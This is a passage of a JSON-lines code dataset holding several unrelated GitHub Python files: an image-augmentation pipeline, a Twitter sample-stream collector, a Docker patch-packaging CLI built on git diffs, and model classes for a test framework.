retrieve_gt_labels[keep_list]\n retrieve_gt_match_indices = retrieve_gt_match_indices[keep_list]\n cp_retrieve_gt_bboxes = cp_retrieve_gt_bboxes[keep_list]\n\n mixup_gt_bboxes = np.concatenate(\n (results[\"gt_bboxes\"], cp_retrieve_gt_bboxes), axis=0\n )\n mixup_gt_labels = np.concatenate(\n (results[\"gt_labels\"], retrieve_gt_labels), axis=0\n )\n mixup_gt_match_indices = np.concatenate(\n (results[\"gt_match_indices\"], retrieve_gt_match_indices), axis=0\n )\n\n # remove outside bbox\n inside_inds = find_inside_bboxes(mixup_gt_bboxes, target_h, target_w)\n mixup_gt_bboxes = mixup_gt_bboxes[inside_inds]\n mixup_gt_labels = mixup_gt_labels[inside_inds]\n mixup_gt_match_indices = mixup_gt_match_indices[inside_inds]\n\n results[\"img\"] = mixup_img.astype(np.uint8)\n results[\"img_shape\"] = mixup_img.shape\n results[\"gt_bboxes\"] = mixup_gt_bboxes\n results[\"gt_labels\"] = mixup_gt_labels\n results[\"gt_match_indices\"] = mixup_gt_match_indices\n\n return results\n\n\n@PIPELINES.register_module()\nclass SeqYOLOXHSVRandomAug(YOLOXHSVRandomAug):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def __call__(self, results):\n outs = []\n for _results in results:\n _results = super().__call__(_results)\n outs.append(_results)\n return outs\n","repo_name":"SysCV/ovtrack","sub_path":"ovtrack/datasets/pipelines/transforms.py","file_name":"transforms.py","file_ext":"py","file_size_in_byte":26640,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"52"} +{"seq_id":"9784152586","text":"import os\nimport pandas as pd\nimport requests\nimport json\n\nbearer_token = os.environ.get(\"BEARER_TOKEN\")\n\ndef create_url():\n return \"https://api.twitter.com/2/tweets/sample/stream?tweet.fields=created_at,lang&expansions=author_id,geo.place_id&user.fields=created_at,public_metrics\"\n\nclass TwitterRandomSampleStream(object):\n def __init__(self,stream_url,save_path):\n self.stream_url = stream_url\n self.tweet_path = save_path\n self.tweets_fp = None\n self.flush_counter = 0 # lets see if this is required\n \n def results_init(self):\n \"\"\"\n \"\"\"\n self.tweets_fp = 
open(self.tweet_path,'w+',encoding='utf-8')\n\n    def bearer_oauth(self, res):\n        \"\"\"\n        Method required by bearer token authentication.\n        \"\"\"\n\n        res.headers[\"Authorization\"] = f\"Bearer {bearer_token}\"\n        res.headers[\"User-Agent\"] = \"v2FilteredStreamPython\"\n        return res\n    \n    def get_stream(self,stream_url):\n        tweet_num = 0\n        try:\n            response = requests.request(\"GET\", stream_url, auth=self.bearer_oauth, stream=True)\n            print(\"Response Status Code : %s\" % str(response.status_code))\n            \n            if response.status_code != 200:\n                raise Exception(\"Cannot get stream (HTTP {}): {}\".format(response.status_code, response.text))\n            \n            for response_line in response.iter_lines():\n                if response_line:\n                    json_response = json.loads(response_line)\n                    self.save_tweet(tweet=json_response)\n                    \n                    if tweet_num % 100 == 0:\n                        print(\"tweets : %s\" % (str(tweet_num)))\n                    tweet_num += 1\n        except KeyboardInterrupt:\n            print(\"Ctrl+C pressed, Stopping Stream ............\")\n            print(\"Flushing and Closing Files ..........\")\n            self.tweets_fp.flush()\n            self.tweets_fp.close()\n    \n    def save_tweet(self,tweet):\n        \"\"\"\n        Append one tweet as a JSON line to the output file.\n        \"\"\"\n        self.tweets_fp.write(json.dumps(tweet,ensure_ascii=False,sort_keys=False)+\"\\n\")\n    \n    def stream(self):\n        \"\"\"\n        Open the output file and start consuming the sample stream.\n        \"\"\"\n        self.results_init()\n        self.get_stream(stream_url=self.stream_url)\n\n\nif __name__ == '__main__':\n    \n    twitter_streamer = TwitterRandomSampleStream(stream_url=create_url(),\n                                                 save_path=\"random_tweets.txt\")\n\n    twitter_streamer.stream()\n    ","repo_name":"karthikshivaram24/Twitter-News-Engagement-Data-Collection","sub_path":"src/seedusers/twitter_random_stream_sampler.py","file_name":"twitter_random_stream_sampler.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"39889080460","text":"# -*- coding: utf-8 -*-\n\nimport logging\nimport os\nimport shutil\nimport sys\nimport tarfile\nimport time\nfrom pathlib import Path\nfrom pprint import pprint\n\nimport click\nimport gitdb\nimport sh\nfrom git import Repo\nfrom prompt_toolkit import prompt\nfrom prompt_toolkit.completion import WordCompleter\n\nGLOBAL_DIFF_FILES = []\nDEFAULT_CODE_PATH = os.path.abspath(os.path.dirname(__file__))\nKEYWORDS_DICT = {'code_path': None, 'config_name': None, 'code_branch': None,\n                 'start_commit': None, 'end_commit': None, 'images_name': None}\n\n\nlogger = logging.getLogger('docker_patch')\nhandler = logging.StreamHandler()\nformatter = logging.Formatter('[%(name)s|%(levelname)-7s]: %(message)s')\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\nlogger.setLevel(logging.DEBUG)\n\n\nclass BaseClass:\n    \"\"\"Shared state for all pipeline steps.\"\"\"\n\n    def __init__(self, code_path, code_branch, start_commit, end_commit, images_name):\n        self.code_path = code_path\n        self.code_branch = code_branch\n        self.start_commit = start_commit\n        self.end_commit = end_commit\n        self.images_name = images_name\n        self.repo = Repo(self.code_path)\n\n\nclass Check(BaseClass):\n    \"\"\"Pre-flight checks of arguments and environment.\"\"\"\n\n    def __init__(self, code_path, code_branch, start_commit, end_commit, images_name):\n        super().__init__(code_path, code_branch, start_commit, end_commit, images_name)\n\n    def _is_root(self):\n        \"\"\"Check that the current user is root.\"\"\"\n        if os.geteuid() != 0:\n            logger.error(f'Please use root to execute the script.')\n            sys.exit(1)\n\n    def _is_tool(self, commands):\n        \"\"\"Check that the required commands exist.\"\"\"\n        from shutil import which\n        for command in commands:\n            if which(command) is None:\n                logger.error(f'The `{command}` command was not found, please install it.')\n                sys.exit(1)\n
            else:\n                logger.info(f'The `{command}` command is installed.')\n\n    def _is_git_repo(self):\n        \"\"\"Check that the path is a git repository.\"\"\"\n        git_repo = os.path.join(self.code_path, '.git')\n        if not os.path.isdir(git_repo):\n            logger.error(f'The {git_repo} is not a git repo.')\n            sys.exit(1)\n        else:\n            logger.info(f'The `{git_repo}` is a git repo.')\n\n    def _repo_is_dirty(self):\n        \"\"\"Check that the repository has no untracked or uncommitted files.\"\"\"\n        if len(self.repo.untracked_files) != 0:\n            logger.error(\n                f'The repo has untracked files: {self.repo.untracked_files}.')\n            sys.exit(1)\n        elif self.repo.is_dirty():\n            logger.error(\n                f'The repo has uncommitted changes.')\n            sys.exit(1)\n        else:\n            logger.info(f'The `{self.repo.git_dir}` is a clean git repo.')\n\n    def _commit_is_right(self):\n        \"\"\"Check that the branch and both commits exist.\"\"\"\n        branches = [str(ref) for ref in self.repo.refs]\n        try:\n            if self.code_branch in branches:\n                if self.repo.commit(self.start_commit) and self.repo.commit(self.end_commit):\n                    logger.info(f\"The `{self.code_branch}` branch exists in the git repo.\")\n                    logger.info(f\"The `{self.start_commit}` and `{self.end_commit}` commits exist in the git repo.\")\n            else:\n                logger.error(f\"The `{self.code_branch}` branch is not found in the git repo.\")\n                sys.exit(1)\n        except gitdb.exc.BadName:\n            logger.error(\n                f\"The `{self.start_commit}` or `{self.end_commit}` commit is not found in the git repo.\")\n            sys.exit(1)\n\n    def _image_is_right(self):\n        \"\"\"Check that the image can be pulled.\"\"\"\n        try:\n            logger.warning(f\"The `{self.images_name}` image is ready to download...\")\n            sh.docker('pull', self.images_name)\n            logger.info(f\"The `{self.images_name}` image exists in the docker repo.\")\n        except sh.ErrorReturnCode_1:\n            logger.error(f\"The `{self.images_name}` image is not found in the docker repo.\")\n            sys.exit(1)\n\n    def run(self):\n        \"\"\"Run all checks.\"\"\"\n        try:\n            self._is_root()\n            self._is_tool(['git', 'docker'])\n            self._is_git_repo()\n            self._repo_is_dirty()\n            self._commit_is_right()\n            self._image_is_right()\n            print()\n        except SystemExit:\n            click.echo(click.style('[E_INFOS] === Package with care, better safe than sorry ===', fg='red'))\n            sys.exit(1)\n\n\nclass Diff(BaseClass):\n    \"\"\"Collect the list of files changed between two commits.\"\"\"\n\n    def __init__(self, code_path, code_branch, start_commit, end_commit, images_name):\n        super().__init__(code_path, code_branch, start_commit, end_commit, images_name)\n\n    def _diff_file(self):\n        \"\"\"Get the list of changed files.\"\"\"\n        new_branch = self.repo.create_head(self.code_branch)\n        if self.repo.active_branch != new_branch:\n            new_branch.checkout()\n            logger.warning(f\"The `{self.repo.active_branch}` branch doesn't match `{self.code_branch}`.\")\n            logger.warning(f\"Automatically switching to the `{self.code_branch}` branch.\")\n        git = self.repo.git\n        try:\n            diff_files = git.diff('--name-only', self.start_commit, self.end_commit).split()\n            GLOBAL_DIFF_FILES.append(diff_files)\n            logger.info(f'List diff files:')\n            pprint(diff_files, indent=4)\n        except git.exc.GitCommandError:\n            logger.error(f\"The diff command execution failed.\")\n            sys.exit(2)\n\n    def run(self):\n        \"\"\"Run the diff step.\"\"\"\n        try:\n            self._diff_file()\n            print()\n        except SystemExit:\n            click.echo(click.style('[E_INFOS] === Package with care, better safe than sorry ===', fg='red'))\n            sys.exit(2)\n\n\nclass PATCH(BaseClass):\n    \"\"\"Start Docker and extract the compiled artifacts (.so/.pyc) for the patch.\"\"\"\n\n    def __init__(self, code_path, config_name, code_branch, start_commit, end_commit, images_name):\n        super().__init__(code_path, code_branch, start_commit, end_commit, images_name)\n        self.config_name = config_name\n\n    def _check_is_file(self, path):\n        if Path(path).is_file():\n            return True\n        else:\n            return False\n
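\n    # NOTE: this helper and _check_is_dir below just wrap pathlib's boolean checks;\n    # returning Path(path).is_file() / Path(path).is_dir() directly would be equivalent.\n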
\n    def _check_is_dir(self, path):\n        if Path(path).is_dir():\n            return True\n        else:\n            return False\n\n    def _check_file_endswith(self, source_file_basename):\n        for suffix in ['.js', '.css', '.html', '.png', '.svg', '.zip']:\n            if source_file_basename.endswith(suffix):\n                return True\n        else:\n            return False\n\n    def _copy_file(self):\n        \"\"\"Copy the changed files and package them.\n        Special conversions: yml -> ctc | py -> so/pyc\n        \"\"\"\n        archive_dir = os.path.join(DEFAULT_CODE_PATH, 'dist')\n        images_info = sh.docker(\"inspect\", \"--format\", \"'{{.GraphDriver.Data.UpperDir}}'\", self.images_name)\n        working_dir = sh.docker(\"inspect\", \"--format\", \"'{{.ContainerConfig.WorkingDir}}'\", self.images_name)\n        if images_info.exit_code == 0 and working_dir.exit_code == 0:\n            images_path = images_info.stdout.decode('utf-8').strip().strip(\"'\")\n            working_path = working_dir.stdout.decode('utf-8').strip().strip(\"'\")\n            copy_file_path = ''.join([images_path, working_path])\n            # rebuild an empty dist directory on every run\n            if not self._check_is_dir(archive_dir):\n                os.makedirs(archive_dir)\n            else:\n                shutil.rmtree(archive_dir)\n                os.makedirs(archive_dir)\n\n            diff_files = GLOBAL_DIFF_FILES.pop()\n            for _file in diff_files:\n                time.sleep(0.5)\n                source_file_path = os.path.join(copy_file_path, _file)\n                source_file_dirname = os.path.dirname(source_file_path)\n                source_file_basename = os.path.basename(source_file_path)\n                target_file_path = os.path.join(archive_dir, _file)\n                target_file_dirname = os.path.dirname(target_file_path)\n                target_file_basename = os.path.basename(target_file_path)\n\n                # files with special conversions\n                if source_file_basename.endswith('.py'):\n                    source_file_is_so = source_file_path.replace('.py', '.so')\n                    source_file_is_pyc = source_file_path.replace('.py', '.pyc')\n                    if self._check_is_file(source_file_is_so):\n                        if not self._check_is_dir(target_file_dirname):\n                            os.makedirs(target_file_dirname)\n                        logger.info(f\"Copying {source_file_basename} to {target_file_dirname} ...\")\n                        shutil.copy2(source_file_is_so, target_file_dirname)\n                    elif self._check_is_file(source_file_is_pyc):\n                        if not self._check_is_dir(target_file_dirname):\n                            os.makedirs(target_file_dirname)\n                        logger.info(f\"Copying {source_file_basename} to {target_file_dirname} ...\")\n                        shutil.copy2(source_file_is_pyc, target_file_dirname)\n                    else:\n                        logger.info(f\"The file <{source_file_basename}> is not in the image, skipping ...\")\n                elif source_file_basename.endswith('.yml'):\n                    source_file_is_yml = source_file_path.replace('.yml', '.ctc')\n                    if self._check_is_file(source_file_is_yml):\n                        if not self._check_is_dir(target_file_dirname):\n                            os.makedirs(target_file_dirname)\n                        logger.info(f\"Copying {source_file_basename} to {target_file_dirname} ...\")\n                        shutil.copy2(source_file_is_yml, target_file_dirname)\n                    else:\n                        logger.info(f\"The file <{source_file_basename}> is not in the image, skipping ...\")\n\n                # plain asset files\n                elif self._check_file_endswith(source_file_basename):\n                    if self._check_is_file(source_file_path):\n                        if not self._check_is_dir(target_file_dirname):\n                            os.makedirs(target_file_dirname)\n                        logger.info(f\"Copying {source_file_basename} to {target_file_dirname} ...\")\n                        shutil.copy2(source_file_path, target_file_dirname)\n                    else:\n                        logger.info(f\"The file <{source_file_basename}> is not in the image, skipping ...\")\n\n                # all remaining files\n                else:\n                    if self._check_is_file(source_file_path):\n                        if not self._check_is_dir(target_file_dirname):\n                            os.makedirs(target_file_dirname)\n                        logger.info(f\"Copying {source_file_basename} to {target_file_dirname} ...\")\n                        shutil.copy2(source_file_path, target_file_dirname)\n                    else:\n                        logger.info(f\"The file <{source_file_basename}> is not in the image, skipping ...\")\n        else:\n            logger.error(f\"The `{images_info}` or `{working_dir}` is not found.\")\n            sys.exit(3)\n
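\n    # The archive below is named patch_<config>_<version>.tar.gz; <version> comes from\n    # the third ':'-separated field of the image name (e.g. registry:port/name:tag).\n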
\n    def _get_tar_packages(self):\n        click.echo(click.style('>>> Generating tar package ...', fg='green'))\n        archive_dir = os.path.join(DEFAULT_CODE_PATH, 'dist')\n        version_number = self.images_name.split(':')[2]\n        archive_name = '_'.join(['patch', self.config_name, version_number]) + \".tar.gz\"\n        if self._check_is_dir(archive_dir):\n            with tarfile.open(archive_name, 'w:gz') as tar_packages:\n                tar_packages.add(archive_dir, arcname='.')\n                # getnames() must be called before the tarfile is closed\n                logger.info(f'List tar package file:')\n                pprint(tar_packages.getnames(), indent=4)\n            logger.info(f\"The `{archive_name}` tar package has been generated successfully.\")\n\n    def run(self):\n        \"\"\"Run the copy-and-package step.\"\"\"\n        try:\n            self._copy_file()\n            print()\n            self._get_tar_packages()\n        except SystemExit:\n            click.echo(click.style('[E_INFOS] === Package with care, better safe than sorry ===', fg='red'))\n            sys.exit(3)\n\n\n@click.command()\n@click.argument('code_path')\n@click.argument('config_name')\n@click.argument('code_branch')\n@click.argument('start_commit')\n@click.argument('end_commit')\n@click.argument('images_name')\ndef tools(code_path, config_name, code_branch, start_commit, end_commit, images_name):\n    \"\"\"A rapidly iterating Docker deployment applet\"\"\"\n    # pre-flight checks\n    click.echo(click.style('>>> Start check info ...', fg='green'))\n    check = Check(code_path, code_branch, start_commit, end_commit, images_name)\n    check.run()\n    # changed files\n    click.echo(click.style('>>> Getting the diff files between commits ...', fg='green'))\n    diff = Diff(code_path, code_branch, start_commit, end_commit, images_name)\n    diff.run()\n    # build the patch package\n    click.echo(click.style('>>> Building the docker image fix pack ...', fg='green'))\n    patch = PATCH(code_path, config_name, code_branch, start_commit, end_commit, images_name)\n    patch.run()\n\n\ndef main():\n    len_args = len(sys.argv)\n    if len_args > 1:\n        user_input_list = []\n        try:\n            for user_input in sys.argv[1:]:\n                user_input_value = user_input.split('=')[1]\n                user_input_list.append(user_input_value)\n            logger.info(f'All the required parameters have been entered.\\n')\n            tools(user_input_list)\n        except Exception:\n            logger.warning(f'The {user_input} is not a supported argument, please try again.')\n            sys.exit(0)\n\n    tools_keywords = list(KEYWORDS_DICT.keys())\n    while True:\n        try:\n            user_input = prompt('TOOLS> ', completer=WordCompleter(tools_keywords))\n            user_input_key = user_input.split('=')[0]\n            user_input_value = user_input.split('=')[1]\n            tmp_dict = {user_input_key: user_input_value}\n            if user_input_key in tools_keywords:\n                KEYWORDS_DICT.update(tmp_dict)\n                tools_keywords.remove(user_input_key)\n                if len(tools_keywords) == 0:\n                    click.echo(click.style('\\n>>> Review the entered keywords ...', fg='green'))\n                    pprint(KEYWORDS_DICT, indent=4)\n                    if click.confirm('Do you want to continue?'):\n                        logger.info(f'All the required parameters have been entered.\\n')\n                        tools(KEYWORDS_DICT.values())\n                        break\n                    else:\n                        break\n            else:\n                logger.warning(f'The {user_input_key} is not a supported argument, please try again.')\n        except Exception:\n            logger.warning(f'There is something wrong with your input, please enter it again.')\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"EscapeLife/awesome-builder","sub_path":"scripts/docker_patch/docker_patch.py","file_name":"docker_patch.py","file_ext":"py","file_size_in_byte":14829,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"52"}
{"seq_id":"32298035141","text":"import types\nfrom functools import cmp_to_key\n\nfrom .enumeration import PDecoratorType, TestFixtureStatus, 
TestClassRunMode, TestCaseStatus\n\nSECOND_MICROSECOND_CONVERSION_FACTOR = 1000000.0\n\n\nclass StatusCount:\n def __init__(self):\n self.total = 0\n self.not_run = 0\n self.running = 0\n self.passed = 0\n self.failed = 0\n self.skipped = 0\n\n\nclass TestContainer:\n def __init__(self):\n self.start_time = None\n self.end_time = None\n self.test_cases = []\n\n @property\n def elapsed_time(self) -> float:\n time_delta = self.end_time - self.start_time\n return time_delta.seconds + time_delta.microseconds / SECOND_MICROSECOND_CONVERSION_FACTOR\n\n @property\n def status_count(self) -> StatusCount:\n count = StatusCount()\n for test_case in self.test_cases:\n count.total += 1\n if test_case.status == TestCaseStatus.NOT_RUN:\n count.not_run += 1\n elif test_case.status == TestCaseStatus.RUNNING:\n count.running += 1\n elif test_case.status == TestCaseStatus.PASSED:\n count.passed += 1\n elif test_case.status == TestCaseStatus.FAILED:\n count.failed += 1\n elif test_case.status == TestCaseStatus.SKIPPED:\n count.skipped += 1\n return count\n\n @property\n def pass_rate(self) -> float:\n status_count = self.status_count\n return float(status_count.passed) * 100 / status_count.total\n\n\nclass TestSuite(TestContainer):\n def __init__(self, name):\n TestContainer.__init__(self)\n self.test_classes = []\n self.test_class_run_groups = []\n self.name = name\n self.full_name = name\n self.before_suite = BeforeSuite(self, None)\n self.after_suite = AfterSuite(self, None)\n\n def init(self):\n self.init_test_fixtures()\n self.init_test_class_run_groups()\n self.sort_test_class_run_groups()\n\n def init_test_fixtures(self):\n # reflect the before suite and after suite\n for test_class in self.test_classes:\n test_class_ref = test_class.test_class_ref.__class__()\n for element in dir(test_class_ref):\n attr = getattr(test_class_ref, element)\n if hasattr(attr, \"__enabled__\") and attr.__enabled__ \\\n and hasattr(attr, \"__pd_type__\"):\n if attr.__pd_type__ == PDecoratorType.BeforeSuite:\n self.before_suite = BeforeSuite(self, attr)\n elif attr.__pd_type__ == PDecoratorType.AfterSuite:\n self.after_suite = AfterSuite(self, attr)\n\n def init_test_class_run_groups(self):\n run_groups = {}\n run_group_index = 0\n for test_class in self.test_classes:\n if test_class.run_group is None:\n run_groups[run_group_index] = [test_class]\n run_group_index += 1\n elif test_class.run_group in run_groups:\n run_groups[test_class.run_group].append(test_class)\n else:\n run_groups[test_class.run_group] = [test_class]\n self.test_class_run_groups = run_groups.values()\n\n def sort_test_class_run_groups(self):\n run_groups = []\n # sort the test classes in run group by its run mode\n for run_group in self.test_class_run_groups:\n run_groups.append(sorted(run_group, key=lambda test_class: test_class.run_mode.value, reverse=True))\n\n # sort the test class run groups by its number of singleline test cases\n def cmp_run_group(run_group_a, run_group_b):\n single_line_count_a = single_line_count_b = parallel_count_a = parallel_count_b = 0\n for test_class in run_group_a:\n if test_class.run_mode == TestClassRunMode.SingleLine:\n single_line_count_a += len(test_class.test_cases)\n else:\n parallel_count_a += len(test_class.test_cases)\n\n for test_class in run_group_b:\n if test_class.run_mode == TestClassRunMode.SingleLine:\n single_line_count_b += len(test_class.test_cases)\n else:\n parallel_count_b += len(test_class.test_cases)\n\n if single_line_count_a == single_line_count_b:\n return parallel_count_a - 
parallel_count_b\n else:\n return single_line_count_a - single_line_count_b\n\n self.test_class_run_groups = sorted(run_groups, key=cmp_to_key(cmp_run_group), reverse=True)\n\n def get_failed_setup_fixture(self):\n if self.before_suite.status == TestFixtureStatus.FAILED:\n return self.before_suite\n return None\n\n def get_test_class(self, full_name: str):\n for test_class in self.test_classes:\n if test_class.full_name == full_name:\n return test_class\n return None\n\n def add_test_case(self, test_class_cls, test_case_func):\n # for the @TestClass can be inherited, so set full name here\n test_class_cls.__full_name__ = \"%s.%s\" % (test_class_cls.__module__, test_class_cls.__name__)\n test_class = self.get_test_class(test_class_cls.__full_name__)\n if test_class is None:\n test_class = TestClass(self, test_class_cls())\n self.test_classes.append(test_class)\n\n test_group = test_class.get_test_group(test_case_func.__group__)\n if test_group is None:\n test_group = TestGroup(test_class, test_case_func.__group__, test_class_cls())\n test_class.test_groups.append(test_group)\n\n test_case = test_group.get_test_case(test_case_func.__name__)\n if test_case is None:\n if hasattr(test_class_cls, test_case_func.__name__): # normal\n test_case = TestCase(test_group, getattr(test_class_cls(), test_case_func.__name__))\n else: # mocked\n test_class_ref = test_class_cls()\n mock_method = types.MethodType(test_case_func, test_class_ref)\n setattr(test_class_ref, test_case_func.__name__, mock_method)\n test_case = TestCase(test_group, mock_method)\n test_group.test_cases.append(test_case)\n test_class.test_cases.append(test_case)\n self.test_cases.append(test_case)\n return True\n return False\n\n\nclass TestClass(TestContainer):\n def __init__(self, test_suite: TestSuite, test_class_ref):\n TestContainer.__init__(self)\n self.test_suite = test_suite\n self.test_class_ref = test_class_ref\n self.test_groups = []\n self.name = test_class_ref.__class__.__name__\n self.full_name = test_class_ref.__full_name__\n self.run_mode = test_class_ref.__run_mode__\n self.run_group = test_class_ref.__run_group__\n self.description = test_class_ref.__description__\n self.custom_args = test_class_ref.__custom_args__\n\n self.before_class = BeforeClass(self, None)\n self.after_class = AfterClass(self, None)\n # reflect the before class and after class\n for element in dir(test_class_ref):\n attr = getattr(test_class_ref, element)\n if hasattr(attr, \"__enabled__\") and attr.__enabled__ \\\n and hasattr(attr, \"__pd_type__\"):\n if attr.__pd_type__ == PDecoratorType.BeforeClass:\n self.before_class = BeforeClass(self, attr)\n elif attr.__pd_type__ == PDecoratorType.AfterClass:\n self.after_class = AfterClass(self, attr)\n\n def get_failed_setup_fixture(self) -> \"TestFixture\":\n setup_fixture = self.test_suite.get_failed_setup_fixture()\n if setup_fixture:\n return setup_fixture\n if self.before_class.status == TestFixtureStatus.FAILED:\n return self.before_class\n return None\n\n def get_test_group(self, name: str) -> \"TestGroup\":\n for test_group in self.test_groups:\n if test_group.name == name:\n return test_group\n return None\n\n @property\n def is_group_feature_used(self) -> bool:\n return not (len(self.test_groups) == 1 and self.test_groups[0].name == \"DEFAULT\" and self.test_groups[\n 0].before_group.is_empty and self.test_groups[0].after_group.is_empty)\n\n\nclass TestGroup(TestContainer):\n def __init__(self, test_class: TestClass, name: str, test_class_ref):\n TestContainer.__init__(self)\n 
self.test_class = test_class\n self.test_suite = self.test_class.test_suite\n self.test_class_ref = test_class_ref\n self.test_cases = []\n self.name = name\n self.full_name = \"%s<%s>\" % (test_class.full_name, name)\n\n self.before_group = BeforeGroup(self, None)\n self.after_group = AfterGroup(self, None)\n # reflect the before group and after group\n for element in dir(test_class_ref):\n attr = getattr(test_class_ref, element)\n if hasattr(attr, \"__enabled__\") and attr.__enabled__ \\\n and hasattr(attr, \"__group__\") and attr.__group__ == self.name \\\n and hasattr(attr, \"__pd_type__\"):\n if attr.__pd_type__ == PDecoratorType.BeforeGroup:\n self.before_group = BeforeGroup(self, attr)\n elif attr.__pd_type__ == PDecoratorType.AfterGroup:\n self.after_group = AfterGroup(self, attr)\n\n def get_failed_setup_fixture(self) -> \"TestFixture\":\n setup_fixture = self.test_class.get_failed_setup_fixture()\n if setup_fixture:\n return setup_fixture\n if self.before_group.status == TestFixtureStatus.FAILED:\n return self.before_group\n return None\n\n def get_test_case(self, name: str) -> \"TestCase\":\n for test_case in self.test_cases:\n if test_case.name == name:\n return test_case\n return None\n\n\nclass TestCase:\n def __init__(self, test_group: TestGroup, test_case_ref):\n self.test_group = test_group\n self.test_class = self.test_group.test_class\n self.test_suite = self.test_class.test_suite\n self.test_case_ref = test_case_ref\n self.name = test_case_ref.__name__\n self.full_name = \"%s.%s\" % (self.test_class.full_name, self.name)\n self.start_time = None\n self.end_time = None\n\n self.test = Test(self, test_case_ref)\n\n self.tags = self.test.tags\n self.expected_exceptions = self.test.expected_exceptions\n self.parameters = self.test.parameters\n self.data_index = self.test.data_index\n self.group = self.test.group\n self.description = self.test.description\n self.custom_args = self.test.custom_args\n self.location = self.test.location\n\n self.before_method = BeforeMethod(self, None)\n self.after_method = AfterMethod(self, None)\n # reflect the before method and after method\n for element in dir(test_case_ref.__self__):\n attr = getattr(test_case_ref.__self__, element)\n if hasattr(attr, \"__enabled__\") and attr.__enabled__ \\\n and hasattr(attr, \"__group__\") and attr.__group__ == self.group \\\n and hasattr(attr, \"__pd_type__\"):\n if attr.__pd_type__ == PDecoratorType.BeforeMethod:\n self.before_method = BeforeMethod(self, attr)\n elif attr.__pd_type__ == PDecoratorType.AfterMethod:\n self.after_method = AfterMethod(self, attr)\n\n def get_failed_setup_fixture(self) -> \"TestFixture\":\n setup_fixture = self.test_group.get_failed_setup_fixture()\n if setup_fixture:\n return setup_fixture\n if self.before_method.status == TestFixtureStatus.FAILED:\n return self.before_method\n return None\n\n @property\n def failure_message(self) -> str:\n return self.test.failure_message\n\n @property\n def failure_type(self) -> str:\n return self.test.failure_type\n\n @property\n def stack_trace(self) -> str:\n return self.test.stack_trace\n\n @property\n def skip_message(self) -> str:\n return self.test.skip_message\n\n @property\n def status(self) -> TestCaseStatus:\n status_map = {\n TestFixtureStatus.NOT_RUN: TestCaseStatus.NOT_RUN,\n TestFixtureStatus.RUNNING: TestCaseStatus.RUNNING,\n TestFixtureStatus.PASSED: TestCaseStatus.PASSED,\n TestFixtureStatus.SKIPPED: TestCaseStatus.SKIPPED,\n TestFixtureStatus.FAILED: TestCaseStatus.FAILED,\n }\n return status_map[self.test.status]\n\n 
@property\n def elapsed_time(self) -> float:\n time_delta = self.end_time - self.start_time\n return time_delta.seconds + time_delta.microseconds / SECOND_MICROSECOND_CONVERSION_FACTOR\n\n\nclass TestFixture:\n def __init__(self, context, test_fixture_ref, fixture_type: PDecoratorType):\n self.context = context\n self.fixture_type = fixture_type\n self.is_empty = False\n self.status = TestFixtureStatus.NOT_RUN\n if test_fixture_ref is None:\n self.is_empty = True\n return\n self.test_fixture_ref = test_fixture_ref\n self.name = test_fixture_ref.__name__\n self.full_name = \"\"\n self.failure_message = \"\"\n self.failure_type = \"\"\n self.stack_trace = \"\"\n self.skip_message = \"\"\n self.start_time = None\n self.end_time = None\n self.logs = []\n self.description = test_fixture_ref.__description__\n self.timeout = test_fixture_ref.__timeout__\n self.custom_args = test_fixture_ref.__custom_args__\n self.location = test_fixture_ref.__location__\n self.parameters_count = test_fixture_ref.__parameters_count__\n\n @property\n def elapsed_time(self) -> float:\n time_delta = self.end_time - self.start_time\n return time_delta.seconds + time_delta.microseconds / SECOND_MICROSECOND_CONVERSION_FACTOR\n\n\nclass BeforeSuite(TestFixture):\n def __init__(self, test_suite: TestSuite, test_fixture_ref):\n TestFixture.__init__(self, test_suite, test_fixture_ref, PDecoratorType.BeforeSuite)\n self.test_suite = self.context\n if not self.is_empty:\n self.full_name = \"%s@%s\" % (test_suite.name, self.fixture_type.value)\n\n\nclass BeforeClass(TestFixture):\n def __init__(self, test_class: TestClass, test_fixture_ref):\n TestFixture.__init__(self, test_class, test_fixture_ref, PDecoratorType.BeforeClass)\n self.test_class = self.context\n self.test_suite = self.test_class.test_suite\n if not self.is_empty:\n self.full_name = \"%s@%s\" % (test_class.full_name, self.fixture_type.value)\n\n\nclass BeforeGroup(TestFixture):\n def __init__(self, test_group: TestGroup, test_fixture_ref):\n TestFixture.__init__(self, test_group, test_fixture_ref, PDecoratorType.BeforeGroup)\n self.test_group = self.context\n self.test_class = self.test_group.test_class\n self.test_suite = self.test_group.test_suite\n if not self.is_empty:\n self.full_name = \"%s@%s\" % (test_group.full_name, self.fixture_type.value)\n self.group = test_fixture_ref.__group__\n\n\nclass BeforeMethod(TestFixture):\n def __init__(self, test_case: TestCase, test_fixture_ref):\n TestFixture.__init__(self, test_case, test_fixture_ref, PDecoratorType.BeforeMethod)\n self.test_case = self.context\n self.test_group = self.test_case.test_group\n self.test_class = self.test_case.test_class\n self.test_suite = self.test_case.test_suite\n if not self.is_empty:\n self.full_name = \"%s@%s\" % (test_case.full_name, self.fixture_type.value)\n self.group = test_fixture_ref.__group__\n\n\nclass Test(TestFixture):\n def __init__(self, test_case: TestCase, test_fixture_ref):\n TestFixture.__init__(self, test_case, test_fixture_ref, PDecoratorType.Test)\n self.full_name = \"%s@%s\" % (test_case.full_name, self.fixture_type.value)\n self.test_case = self.context\n self.test_group = self.test_case.test_group\n self.test_class = self.test_case.test_class\n self.test_suite = self.test_case.test_suite\n self.tags = test_fixture_ref.__tags__\n self.expected_exceptions = test_fixture_ref.__expected_exceptions__\n self.parameters = test_fixture_ref.__parameters__\n self.data_index = test_fixture_ref.__data_index__\n self.group = test_fixture_ref.__group__\n\n\nclass 
